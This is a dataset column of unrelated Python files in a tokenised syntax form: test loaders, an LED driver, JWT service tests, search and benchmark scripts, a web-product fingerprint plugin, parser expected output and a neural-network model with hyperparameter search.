content
stringlengths
0
1.55M
# import Kratos <import_stmt>KratosMultiphysics<import_stmt>KratosMultiphysics.MetisApplication<if_stmt><not>KratosMultiphysics.IsDistributedRun()<block_start><raise>Exception("This test script can only be executed in MPI!")<block_end># Import Kratos "wrapper" for unittests <import_stmt>KratosMultiphysics.KratosUnittest<as>KratosUnittest<line_sep># Import the tests o test_classes to create the suits <import_from_stmt>test_metis_submodelpart_list TestMetisSubModelPartList<def_stmt>AssembleTestSuites <block_start>''' Populates the test suites to run. Populates the test suites to run. At least, it should pupulate the suites: "mpi_small", "mpi_nightly" and "mpi_all" Return ------ suites: A dictionary of suites The set of suites with its test_cases added. '''<line_sep>suites=KratosUnittest.KratosSuites<line_sep># Create a test suit with the selected tests (Small tests): # smallSuite will contain the following tests: # - testSmallExample smallMPISuite=suites['mpi_small']<line_sep>smallMPISuite.addTests(KratosUnittest.TestLoader().loadTestsFromTestCases([TestMetisSubModelPartList]))<line_sep># Create a test suit with the selected tests # nightSuite will contain the following tests: # - testSmallExample # - testNightlyFirstExample # - testNightlySecondExample nightMPISuite=suites['mpi_nightly']<line_sep>nightMPISuite.addTests(smallMPISuite)<line_sep># Create a test suit that contains all the tests from every testCase # in the list: allMPISuite=suites['mpi_all']<line_sep>allMPISuite.addTests(nightMPISuite)<line_sep><return>suites<block_end><if_stmt>__name__<eq>'__main__'<block_start>KratosUnittest.runTests(AssembleTestSuites())<block_end>
MODE_5X11=0b00000011<class_stmt>I2cConstants<block_start><def_stmt>__init__ self<block_start>self.I2C_ADDR=0x60<line_sep>self.CMD_SET_MODE=0x00<line_sep>self.CMD_SET_BRIGHTNESS=0x19<line_sep>self.MODE_5X11=0b00000011<block_end><block_end><class_stmt>IS31FL3730<block_start><def_stmt>__init__ self smbus font<block_start>self.bus=smbus<line_sep>self.font=font<line_sep>self.i2cConstants=I2cConstants()<line_sep>self._rotate=<false><line_sep>self.bus=self.bus.SMBus(1)<line_sep>self.buffer=[0]<times>11<line_sep>self.offset=0<line_sep>self.error_count=0<line_sep>self.set_mode(self.i2cConstants.MODE_5X11)<block_end><def_stmt>set_rotate self value<block_start>self._rotate=value<block_end><def_stmt>rotate5bits self x<block_start>r=0<if_stmt>x&16<block_start>r=r|1<block_end><if_stmt>x&8<block_start>r=r|2<block_end><if_stmt>x&4<block_start>r=r|4<block_end><if_stmt>x&2<block_start>r=r|8<block_end><if_stmt>x&1<block_start>r=r|16<block_end><return>r<block_end><def_stmt>update self<block_start><if_stmt>self.offset+11<le>len(self.buffer)<block_start>self.window=self.buffer[self.offset:self.offset+11]<block_end><else_stmt><block_start>self.window=self.buffer[self.offset:]<line_sep>self.window<augadd>self.buffer[:11-len(self.window)]<block_end><if_stmt>self._rotate<block_start>self.window.reverse()<for_stmt>i range(len(self.window))<block_start>self.window[i]=self.rotate5bits(self.window[i])<block_end><block_end>self.window.append(0xff)<try_stmt><block_start>self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR 0x01 self.window)<block_end><except_stmt>IOError<block_start>self.error_count<augadd>1<if_stmt>self.error_count<eq>10<block_start>print("A high number of IO Errors have occurred, please check your soldering/connections.")<block_end><block_end><block_end><def_stmt>set_mode self mode=MODE_5X11<block_start>self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR self.i2cConstants.CMD_SET_MODE [self.i2cConstants.MODE_5X11])<block_end><def_stmt>get_brightness self<block_start><if_stmt>hasattr(self 'brightness')<block_start><return>self.brightness<block_end><return>-1<block_end><def_stmt>set_brightness self brightness<block_start>self.brightness=brightness<line_sep>self.bus.write_i2c_block_data(self.i2cConstants.I2C_ADDR self.i2cConstants.CMD_SET_BRIGHTNESS [self.brightness])<block_end><def_stmt>set_col self x value<block_start><if_stmt>len(self.buffer)<le>x<block_start>self.buffer<augadd>[0]<times>(x-len(self.buffer)+1)<block_end>self.buffer[x]=value<block_end><def_stmt>write_string self chars x=0<block_start><for_stmt>char chars<block_start><if_stmt>ord(char)<eq>0x20<or>ord(char)<not><in>self.font<block_start>self.set_col(x 0)<line_sep>x<augadd>1<line_sep>self.set_col(x 0)<line_sep>x<augadd>1<line_sep>self.set_col(x 0)<line_sep>x<augadd>1<block_end><else_stmt><block_start>font_char=self.font[ord(char)]<for_stmt>i range(0 len(font_char))<block_start>self.set_col(x font_char[i])<line_sep>x<augadd>1<block_end>self.set_col(x 0)<line_sep>x<augadd>1# space between chars <block_end><block_end>self.update()<block_end># draw a graph across the screen either using # the supplied min/max for scaling or auto # scaling the output to the min/max values # supplied <def_stmt>graph self values low=<none> high=<none><block_start>values=[float(x)<for>x values]<if_stmt>low<eq><none><block_start>low=min(values)<block_end><if_stmt>high<eq><none><block_start>high=max(values)<block_end>span=high-low<for_stmt>col,value enumerate(values)<block_start>value<augsub>low<line_sep>value<augdiv>span<line_sep>value<augmul>5<if_stmt>value<g>5<block_start>value=5<block_end><if_stmt>value<l>0<block_start>value=0<block_end>self.set_col(col [0 16 24 28 30 31][int(value)])<block_end>self.update()<block_end><def_stmt>set_buffer self replacement<block_start>self.buffer=replacement<block_end><def_stmt>buffer_len self<block_start><return>len(self.buffer)<block_end><def_stmt>scroll self delta=1<block_start>self.offset<augadd>delta<line_sep>self.offset<augmod>len(self.buffer)<line_sep>self.update()<block_end><def_stmt>clear_buffer self<block_start>self.offset=0<line_sep>self.buffer=[0]<times>11<block_end><def_stmt>clear self<block_start>self.clear_buffer()<line_sep>self.update()<block_end><def_stmt>load_font self new_font<block_start>self.font=new_font<block_end><def_stmt>scroll_to self pos=0<block_start>self.offset=pos<line_sep>self.offset<augmod>len(self.buffer)<line_sep>self.update()<block_end><def_stmt>io_errors self<block_start><return>self.error_count<block_end><def_stmt>set_pixel self x y value<block_start><if_stmt>value<block_start>self.buffer[x]<augor>(1<lshift>y)<block_end><else_stmt><block_start>self.buffer[x]<augand>~(1<lshift>y)<block_end><block_end><block_end>
<import_stmt>datetime<import_stmt>unittest<import_from_stmt>flask Blueprint request jsonify<import_from_stmt>freezegun freeze_time<import_from_stmt>mock Mock patch<import_stmt>jwt<import_from_stmt>requests.exceptions HTTPError<import_from_stmt>shared_helpers services<import_from_stmt>testing TrottoTestCase LIVE_APP_HOST<class_stmt>TestFunctions(unittest.TestCase)<block_start>@patch('shared_helpers.services.get_service_config' return_value={'signing_secret':'so_secret'})<def_stmt>test__create_internal_token self mock_get_service_config<block_start>now=datetime.datetime.now(datetime.timezone.utc)<with_stmt>freeze_time(now)<block_start>token=services._create_internal_token('my_service' {'id':1})<line_sep>self.assertEqual({'exp':int(now.timestamp())+30 'id':1} jwt.decode(token 'so_secret' algorithms=['HS256']))<block_end><with_stmt>freeze_time(now+datetime.timedelta(seconds=40))<block_start><with_stmt>self.assertRaises(jwt.exceptions.ExpiredSignatureError)<block_start>jwt.decode(token 'so_secret' algorithms=['HS256'])<block_end><block_end>mock_get_service_config.assert_called_once_with('my_service')<block_end>@patch('shared_helpers.services.requests.get')@patch('shared_helpers.services._create_internal_token' return_value='internal_token')@patch('shared_helpers.services.get_service_config' return_value={'base_url':'https://trot.to'})<def_stmt>test_get__basic self mock_get_service_config mock_create_internal_token mock_requests_get<block_start>mock_response=Mock()<line_sep>mock_response.json.return_value={'id':1}<line_sep>mock_requests_get.return_value=mock_response<line_sep>self.assertEqual({'id':1} services.get('my_service' 'api/users'))<line_sep>mock_get_service_config.assert_called_once_with('my_service')<line_sep>mock_create_internal_token.assert_called_once_with('my_service' {'url':'https://trot.to/api/users'})<line_sep>mock_requests_get.assert_called_once_with('https://trot.to/api/users' headers={'X-Token':'internal_token'})<block_end>@patch('shared_helpers.services.requests.get')@patch('shared_helpers.services._create_internal_token' return_value='internal_token')@patch('shared_helpers.services.get_service_config' return_value={'base_url':'https://trot.to/'})<def_stmt>test_get__trailing_and_leading_slashes self mock_get_service_config mock_create_internal_token mock_requests_get<block_start>mock_response=Mock()<line_sep>mock_response.json.return_value={'id':1}<line_sep>mock_requests_get.return_value=mock_response<line_sep>self.assertEqual({'id':1} services.get('my_service' '/api/users'))<line_sep>mock_get_service_config.assert_called_once_with('my_service')<line_sep>mock_create_internal_token.assert_called_once_with('my_service' {'url':'https://trot.to/api/users'})<line_sep>mock_requests_get.assert_called_once_with('https://trot.to/api/users' headers={'X-Token':'internal_token'})<block_end>@patch('shared_helpers.services.requests.get')@patch('shared_helpers.services._create_internal_token' return_value='internal_token')@patch('shared_helpers.services.get_service_config' return_value={'base_url':'https://trot.to'})<def_stmt>test_get__http_error self mock_get_service_config mock_create_internal_token mock_requests_get<block_start>mock_response=Mock()<line_sep>mock_response.raise_for_status.side_effect=HTTPError<line_sep>mock_requests_get.return_value=mock_response<with_stmt>self.assertRaises(HTTPError)<block_start>services.get('my_service' 'api/users')<block_end>mock_get_service_config.assert_called_once_with('my_service')<line_sep>mock_create_internal_token.assert_called_once_with('my_service' {'url':'https://trot.to/api/users'})<line_sep>mock_requests_get.assert_called_once_with('https://trot.to/api/users' headers={'X-Token':'internal_token'})<block_end><def_stmt>test_validate_internal_request__no_token self<block_start>mock_request=Mock()<line_sep>mock_request.headers={}<with_stmt>self.assertRaises(services.InvalidInternalToken)<as>cm<block_start>services.validate_internal_request(mock_request)<block_end>self.assertEqual('no token' str(cm.exception))<block_end>@patch('shared_helpers.services.get_config_by_key_path' return_value='so_secret')<def_stmt>test_validate_internal_request__invalid_signature__wrong_secret self mock_get_config_by_key_path<block_start>token=jwt.encode({'exp':datetime.datetime.utcnow()+datetime.timedelta(seconds=30) 'url':'https://trot.to/api/users'} 'a_secret' algorithm='HS256')<line_sep>mock_request=Mock()<line_sep>mock_request.headers={'X-Token':token}<line_sep>mock_request.url='https://trot.to/api/users'<with_stmt>self.assertRaises(services.InvalidInternalToken)<as>cm<block_start>services.validate_internal_request(mock_request)<block_end>self.assertEqual('invalid signature' str(cm.exception))<line_sep>mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])<block_end>@patch('shared_helpers.services.get_config_by_key_path' return_value='so_secret')<def_stmt>test_validate_internal_request__invalid_signature__no_exp self mock_get_config_by_key_path<block_start>token=jwt.encode({'url':'https://trot.to/api/users'} 'so_secret' algorithm='HS256')<line_sep>mock_request=Mock()<line_sep>mock_request.headers={'X-Token':token}<line_sep>mock_request.url='https://trot.to/api/users'<with_stmt>self.assertRaises(services.InvalidInternalToken)<as>cm<block_start>services.validate_internal_request(mock_request)<block_end>self.assertEqual('missing exp' str(cm.exception))<line_sep>mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])<block_end>@patch('shared_helpers.services.get_config_by_key_path' return_value='so_secret')<def_stmt>test_validate_internal_request__expired_token self mock_get_config_by_key_path<block_start>token=jwt.encode({'exp':datetime.datetime.utcnow()-datetime.timedelta(seconds=1) 'url':'https://trot.to/api/users'} 'so_secret' algorithm='HS256')<line_sep>mock_request=Mock()<line_sep>mock_request.headers={'X-Token':token}<line_sep>mock_request.url='https://trot.to/api/users'<with_stmt>self.assertRaises(services.InvalidInternalToken)<as>cm<block_start>services.validate_internal_request(mock_request)<block_end>self.assertEqual('expired' str(cm.exception))<line_sep>mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])<block_end>@patch('shared_helpers.services.get_config_by_key_path' return_value='so_secret')<def_stmt>test_validate_internal_request__mismatched_url self mock_get_config_by_key_path<block_start>token=jwt.encode({'exp':datetime.datetime.utcnow()+datetime.timedelta(seconds=30) 'url':'https://trot.to/api/users/1'} 'so_secret' algorithm='HS256')<line_sep>mock_request=Mock()<line_sep>mock_request.headers={'X-Token':token}<line_sep>mock_request.url='https://trot.to/api/users'<with_stmt>self.assertRaises(services.InvalidInternalToken)<as>cm<block_start>services.validate_internal_request(mock_request)<block_end>self.assertEqual('mismatched URL' str(cm.exception))<line_sep>mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])<block_end>@patch('shared_helpers.services.get_config_by_key_path' return_value='so_secret')<def_stmt>test_validate_internal_request__valid_token self mock_get_config_by_key_path<block_start>token=jwt.encode({'exp':datetime.datetime.utcnow()+datetime.timedelta(seconds=30) 'url':'https://trot.to/api/users'} 'so_secret' algorithm='HS256')<line_sep>mock_request=Mock()<line_sep>mock_request.headers={'X-Token':token}<line_sep>mock_request.url='https://trot.to/api/users'<line_sep>self.assertEqual(<true> services.validate_internal_request(mock_request))<line_sep>mock_get_config_by_key_path.assert_called_once_with(['signing_secret'])<block_end><block_end>routes=Blueprint('test' __name__)<line_sep>@routes.route('/_/api/users' methods=['GET'])<def_stmt>get_users <block_start>services.validate_internal_request(request)<line_sep><return>jsonify([{'id':1}])<block_end><class_stmt>TestIntegration(TrottoTestCase)<block_start>blueprints_under_test=[routes]<line_sep>start_live_app=<true><line_sep>live_app_config={'sessions_secret':'a_sessions_secret' 'signing_secret':'so_secret' 'postgres':{'url':'postgresql://admin:testing@/testing_trotto_core'}}<line_sep>@patch('shared_helpers.config.get_config' return_value={'services':{'my_service':{'signing_secret':'so_secret' 'base_url':LIVE_APP_HOST}}})<def_stmt>test_internal_request__real_handler__valid_token self _<block_start>self.assertEqual([{'id':1}] services.get('my_service' '/_/api/users'))<block_end>@patch('shared_helpers.config.get_config' return_value={'services':{'my_service':{'signing_secret':'a_secret' 'base_url':LIVE_APP_HOST}}})<def_stmt>test_internal_request__real_handler__invalid_token self _<block_start><with_stmt>self.assertRaises(HTTPError)<as>cm<block_start>self.assertEqual([{'id':1}] services.get('my_service' '/_/api/users'))<block_end>self.assertEqual(500 cm.exception.response.status_code)<block_end><block_end>
__copyright__="Copyright (c) 2021 Jina AI Limited. All rights reserved."<line_sep>__license__="Apache-2.0"<import_stmt>os<import_stmt>sys<import_stmt>click<import_stmt>random<import_from_stmt>jina Flow Document DocumentArray<import_from_stmt>jina.logging.predefined default_logger<as>logger<line_sep>MAX_DOCS=int(os.environ.get('JINA_MAX_DOCS' 10000))<def_stmt>config dataset:str<block_start><if_stmt>dataset<eq>'toy'<block_start>os.environ['JINA_DATA_FILE']=os.environ.get('JINA_DATA_FILE' 'data/toy-input.txt')<block_end><elif_stmt>dataset<eq>'full'<block_start>os.environ['JINA_DATA_FILE']=os.environ.get('JINA_DATA_FILE' 'data/input.txt')<block_end>os.environ['JINA_PORT']=os.environ.get('JINA_PORT' str(45678))<line_sep>cur_dir=os.path.dirname(os.path.abspath(__file__))<line_sep>os.environ.setdefault('JINA_WORKSPACE' os.path.join(cur_dir 'workspace'))<line_sep>os.environ.setdefault('JINA_WORKSPACE_MOUNT' f'{os.environ.get("JINA_WORKSPACE")}:/workspace/workspace')<block_end><def_stmt>print_topk resp sentence<block_start><for_stmt>doc resp.data.docs<block_start>print(f"\n\n\nTa-Dah🔮, here's what we found for: {sentence}")<for_stmt>idx,match enumerate(doc.matches)<block_start>score=match.scores['cosine'].value<line_sep>print(f'> {idx:>2d}({score:.2f}). {match.text}')<block_end><block_end><block_end><def_stmt>input_generator num_docs:int file_path:str<block_start><with_stmt>open(file_path)<as>file<block_start>lines=file.readlines()<block_end>num_lines=len(lines)<line_sep>random.shuffle(lines)<for_stmt>i range(min(num_docs num_lines))<block_start><yield>Document(text=lines[i])<block_end><block_end><def_stmt>index num_docs<block_start>flow=Flow().load_config('flows/flow.yml')<line_sep>data_path=os.path.join(os.path.dirname(__file__) os.environ.get('JINA_DATA_FILE' <none>))<with_stmt>flow<block_start>flow.post(on='/index' inputs=input_generator(num_docs data_path) show_progress=<true>)<block_end><block_end><def_stmt>query top_k<block_start>flow=Flow().load_config('flows/flow.yml')<with_stmt>flow<block_start>text=input('Please type a sentence: ')<line_sep>doc=Document(content=text)<line_sep>result=flow.post(on='/search' inputs=DocumentArray([doc]) parameters={'top_k':top_k} line_format='text' return_results=<true> )<line_sep>print_topk(result[0] text)<block_end><block_end>@click.command()@click.option('--task' '-t' type=click.Choice(['index' 'query'] case_sensitive=<false>) )@click.option('--num_docs' '-n' default=MAX_DOCS)@click.option('--top_k' '-k' default=5)@click.option('--dataset' '-d' type=click.Choice(['toy' 'full']) default='toy')<def_stmt>main task num_docs top_k dataset<block_start>config(dataset)<if_stmt>task<eq>'index'<block_start><if_stmt>os.path.exists(os.environ.get("JINA_WORKSPACE"))<block_start>logger.error(f'\n +---------------------------------------------------------------------------------+ \ \n | 🤖🤖🤖 | \ \n | The directory {os.environ.get("JINA_WORKSPACE")} already exists. Please remove it before indexing again. | \ \n | 🤖🤖🤖 | \ \n +---------------------------------------------------------------------------------+')<line_sep>sys.exit(1)<block_end>index(num_docs)<block_end><elif_stmt>task<eq>'query'<block_start>query(top_k)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
<import_from_stmt>tableschema Table<line_sep># Data from WEB, schema from MEMORY SOURCE='https://raw.githubusercontent.com/frictionlessdata/tableschema-py/master/data/data_infer.csv'<line_sep>SCHEMA={'fields':[{'name':'id' 'type':'integer'} {'name':'age' 'type':'integer'} {'name':'name' 'type':'string'}]}<line_sep># If schema is not passed it will be inferred table=Table(SOURCE schema=SCHEMA)<line_sep>rows=table.iter()<while_stmt><true><block_start><try_stmt><block_start>print(next(rows))<block_end><except_stmt>StopIteration<block_start><break><block_end><except_stmt>Exception<as>exception<block_start>print(exception)<block_end><block_end>
<import_stmt>re<import_stmt>lib.core.common<line_sep>__product__="3dcart"<line_sep>__description__=("The 3dcart Shopping Cart Software is a complete e-commerce solution for anyone.")<def_stmt>search html **kwargs<block_start>html=str(html)<line_sep>headers=kwargs.get("headers" <none>)<line_sep>plugin_detection_schema=(re.compile(r"3dcart.stats" re.I) re.compile(r"/3dvisit/" re.I))<for_stmt>plugin plugin_detection_schema<block_start><if_stmt>plugin.search(html)<is><not><none><block_start><return><true><block_end><if_stmt>plugin.search(headers.get(lib.core.common.HTTP_HEADER.SET_COOKIE ""))<is><not><none><block_start><return><true><block_end><block_end><block_end>
expected_output={"tag":{"test":{"system_id":{"R2_xr":{"type":{"L1L2":{"area_address":["49.0001"] "circuit_id":"R1_xe.01" "format":"Phase V" "interface":"GigabitEthernet2.115" "ip_address":["10.12.115.2*"] "ipv6_address":["FE80::F816:3EFF:FE67:2452"] "nsf":"capable" "priority":64 "state":"up" "topology":["ipv4" "ipv6"] "uptime":"3d04h" }}} "R3_nx":{"type":{"L1L2":{"area_address":["49.0001"] "circuit_id":"R1_xe.02" "format":"Phase V" "interface":"GigabitEthernet3.115" "ip_address":["10.13.115.3*"] "ipv6_address":["FE80::5C01:FF:FE02:7"] "nsf":"capable" "priority":64 "state":"up" "topology":["ipv4" "ipv6"] "uptime":"3d04h" }}} }} "test1":{"system_id":{"2222.22ff.4444":{"type":{"L1L2":{"area_address":["49.0001"] "circuit_id":"2222.22ff.4444.01" "format":"Phase V" "interface":"GigabitEthernet2.415" "ip_address":["10.12.115.2*"] "ipv6_address":["FE80::F816:3EFF:FE67:2452"] "nsf":"capable" "priority":128 "state":"init" "topology":["ipv4" "ipv6"] "uptime":"3d04h" }}} "R3_nx":{"type":{"L1L2":{"area_address":["49.0001"] "circuit_id":"R1_xe.02" "format":"Phase V" "interface":"GigabitEthernet3.415" "ip_address":["10.13.115.3*"] "ipv6_address":["FE80::5C01:FF:FE02:7"] "nsf":"capable" "priority":64 "state":"up" "topology":["ipv4" "ipv6"] "uptime":"3d04h" }}} }} }}<line_sep>
<import_from_stmt>wasmer engine Store Module Instance<import_from_stmt>wasmer_compiler_cranelift Compiler<as>Cranelift<import_from_stmt>wasmer_compiler_llvm Compiler<as>LLVM<import_from_stmt>wasmer_compiler_singlepass Compiler<as>Singlepass<line_sep>TEST_BYTES=open('benchmarks/nbody.wasm' 'rb').read()<def_stmt>test_benchmark_headless_time_nbody_cranelift_jit benchmark<block_start>store=Store(engine.JIT(Cranelift))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store serialized)<line_sep>_=Instance(deserialized)<block_end><block_end><def_stmt>test_benchmark_headless_time_nbody_cranelift_native benchmark<block_start>store=Store(engine.Native(Cranelift))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store serialized)<line_sep>_=Instance(deserialized)<block_end><block_end><def_stmt>test_benchmark_headless_time_nbody_llvm_jit benchmark<block_start>store=Store(engine.JIT(LLVM))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store serialized)<line_sep>_=Instance(deserialized)<block_end><block_end><def_stmt>test_benchmark_headless_time_nbody_llvm_native benchmark<block_start>store=Store(engine.Native(LLVM))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store serialized)<line_sep>_=Instance(deserialized)<block_end><block_end><def_stmt>test_benchmark_headless_time_nbody_singlepass_jit benchmark<block_start>store=Store(engine.JIT(Singlepass))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store serialized)<line_sep>_=Instance(deserialized)<block_end><block_end><def_stmt>test_benchmark_headless_time_nbody_singlepass_native benchmark<block_start>store=Store(engine.Native(Singlepass))<line_sep>module=Module(store TEST_BYTES)<line_sep>serialized=module.serialize()<line_sep>@benchmark<def_stmt>bench <block_start>deserialized=Module.deserialize(store serialized)<line_sep>_=Instance(deserialized)<block_end><block_end>
<class_stmt>CliArgs(object)<block_start><def_stmt>__init__ self<block_start>self.search=[]<line_sep>self.all=<false><line_sep>self.slim=<false><line_sep>self.include=<false><line_sep>self.order=<false><line_sep>self.reverse=<false><line_sep>self.json=<false><line_sep>self.version=<false><block_end><block_end>
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>physics_aware_training.digital_twin_utils<class_stmt>SplitInputParameterNet(nn.Module)<block_start><def_stmt>__init__ self input_dim nparams output_dim parameterNunits=[100 100 100] internalNunits=[10 10 10]<block_start>''' Defines network that splits inputs x into physical system input and parameters. Inputs are propagated through a "main" neural network whose weights are predicted by an auxiliary neural network whose inputs are the parameters. Args: inputDim (int): dimension of physical system inputs outputDim (int): dimension of physical system outputs parameterDim (int): dimension of all physical system parameters combined parameterNunits (list of int): defines the number of hidden units per layer in the auxiliary parameter network. internalDim (int): number of hidden units per layer of the main neural network that propagates physical system inputs inputNlayers (int): number of hidden layers of main neural network '''<line_sep>super(SplitInputParameterNet self).__init__()<line_sep>self.input_dim=input_dim<line_sep>self.nparams=nparams<line_sep>self.output_dim=output_dim<line_sep>self.internalNunits=internalNunits<line_sep>self.inputNlayers=len(internalNunits)<line_sep>nparameters=0<for_stmt>i range(len(internalNunits)-1)<block_start>nparameters<augadd>internalNunits[i]<times>internalNunits[i+1]<line_sep>nparameters<augadd>internalNunits[i+1]<block_end># parameterNet is a submodel that predicts a matrix of dimensions self.parameterNet=torch.nn.Sequential()<line_sep>self.parameterNet.add_module("fcIn" torch.nn.Linear(nparams parameterNunits[0]))<for_stmt>i range(len(parameterNunits))<block_start><if_stmt>i<l>len(parameterNunits)-1<block_start>self.parameterNet.add_module(f"relu{i}" torch.nn.ReLU())<line_sep>self.parameterNet.add_module(f"fc{i}" torch.nn.Linear(parameterNunits[i] parameterNunits[i+1]))<block_end><else_stmt><block_start>self.parameterNet.add_module(f"relu{i}" torch.nn.ReLU())<line_sep>self.parameterNet.add_module(f"fcOut" torch.nn.Linear(parameterNunits[i] nparameters))<block_end><block_end># two fully connected input and output layers adjust the input and output dimenstion to # the internal dimension self.fcIn=nn.Linear(input_dim internalNunits[0])<line_sep>self.fcOut=nn.Linear(internalNunits[-1] output_dim)<block_end><def_stmt>forward self x<block_start>batch_size,_=x.shape<line_sep># initialize matrices for inputNet inputNetMatrices=[]<line_sep>inputNetBiases=[]<for_stmt>i range(len(self.internalNunits)-1)<block_start>inputNetMatrices.append([torch.zeros(batch_size self.internalNunits[i] self.internalNunits[i+1])])<line_sep>inputNetBiases.append([torch.zeros(batch_size self.internalNunits[i+1] 1)])<block_end># split x into physical system inputs and parameters inputs=x[: :self.input_dim]<line_sep>parameters=x[: self.input_dim:]<line_sep># AUXILIARY PARAMETER NETWORK parameters=self.parameterNet(parameters)<line_sep># fill inputNetMatrices with outputs from parameterNet index=0<for_stmt>i range(len(self.internalNunits)-1)<block_start>index_temp=index<line_sep>index<augadd>self.internalNunits[i]<times>self.internalNunits[i+1]<line_sep>inputNetMatrices[i]=parameters[: index_temp:index].reshape(batch_size self.internalNunits[i+1] self.internalNunits[i])<block_end># fill inputNetBiases with outputs from parameterNet <for_stmt>i range(len(self.internalNunits)-1)<block_start>index_temp=index<line_sep>index<augadd>self.internalNunits[i+1]<line_sep>inputNetBiases[i]=parameters[: index_temp:index].reshape(batch_size self.internalNunits[i+1] 1)<block_end># MAIN INPUT NETWORK inputs=self.fcIn(inputs).unsqueeze(-1)<line_sep># MAIN INPUT NETWORK <for_stmt>i range(len(self.internalNunits)-1)# apply matrices and biases just filled with outputs from parameterNet <block_start>inputs=torch.bmm(inputNetMatrices[i] inputs)<line_sep>inputs<augadd>inputNetBiases[i]<line_sep>inputs=torch.relu(inputs)<block_end><return>self.fcOut(inputs.squeeze(-1))<block_end><block_end><class_stmt>SplitInputParameterObjective(object)# define class to smuggle additional arguments into objective function <block_start><def_stmt>__init__ self train_loader test_loader dt_path input_dim nparams output_dim **modelargs<block_start>self.modelargs=modelargs<line_sep>self.dt_path=dt_path<line_sep>self.train_loader=train_loader<line_sep>self.test_loader=test_loader<line_sep>self.input_dim=input_dim<line_sep>self.nparams=nparams<line_sep>self.output_dim=output_dim<block_end><def_stmt>__call__ self trial<block_start>lr=trial.suggest_loguniform("lr" 1e-4 1e-1)<line_sep>parameterNlayers=trial.suggest_categorical("parameterNlayers" [1 2 3 4 5])<line_sep>parameterNunits=[]<if_stmt>parameterNlayers<eq>1<block_start>parameterNunits.append(int(trial.suggest_loguniform("Nunits1" 50 1000)))<block_end><if_stmt>parameterNlayers<eq>2<block_start>parameterNunits.append(int(trial.suggest_loguniform("Nunits1" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits2" 50 1000)))<block_end><if_stmt>parameterNlayers<eq>3<block_start>parameterNunits.append(int(trial.suggest_loguniform("Nunits1" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits2" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits3" 50 1000)))<block_end><if_stmt>parameterNlayers<eq>4<block_start>parameterNunits.append(int(trial.suggest_loguniform("Nunits1" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits2" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits3" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits4" 50 1000)))<block_end><if_stmt>parameterNlayers<eq>5<block_start>parameterNunits.append(int(trial.suggest_loguniform("Nunits1" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits2" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits3" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits4" 50 1000)))<line_sep>parameterNunits.append(int(trial.suggest_loguniform("Nunits5" 50 1000)))<block_end>internalNlayers=trial.suggest_categorical("internalNlayers" [1 2 3 4 5])<line_sep>internalNunits=[]<if_stmt>parameterNlayers<eq>1<block_start>internalNunits.append(int(trial.suggest_loguniform("iNunits1" 10 100)))<block_end><if_stmt>parameterNlayers<eq>2<block_start>internalNunits.append(int(trial.suggest_loguniform("iNunits1" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits2" 10 100)))<block_end><if_stmt>parameterNlayers<eq>3<block_start>internalNunits.append(int(trial.suggest_loguniform("iNunits1" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits2" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits3" 10 100)))<block_end><if_stmt>parameterNlayers<eq>4<block_start>internalNunits.append(int(trial.suggest_loguniform("iNunits1" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits2" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits3" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits4" 10 100)))<block_end><if_stmt>parameterNlayers<eq>5<block_start>internalNunits.append(int(trial.suggest_loguniform("iNunits1" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits2" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits3" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits4" 10 100)))<line_sep>internalNunits.append(int(trial.suggest_loguniform("iNunits5" 10 100)))<block_end>name=f"{self.dt_path}_v{trial.number}"#create name with trial index value,model_path=physics_aware_training.digital_twin_utils.train_loop_reg_model(self.train_loader self.test_loader name self.input_dim self.nparams self.output_dim Model=SplitInputParameterNet parameterNunits=parameterNunits internalNunits=internalNunits lr=lr **self.modelargs)<line_sep>trial.set_user_attr('model_path' model_path)#save the model path string in NAS study <return>value<block_end><block_end>
<import_from_stmt>..compiler.spec_assembler get_specs<import_from_stmt>. utils<import_from_stmt>..systems.docker get_dusty_container_name<def_stmt>execute_shell app_or_service_name<block_start>specs=get_specs()<if_stmt>app_or_service_name<not><in>[spec.name<for>spec specs.get_apps_and_services()]<block_start><raise>KeyError('No app or service found named {}'.format(app_or_service_name))<block_end>exec_options=utils.exec_docker_options()<line_sep>utils.exec_docker('exec' exec_options get_dusty_container_name(app_or_service_name) '/bin/bash')<block_end>
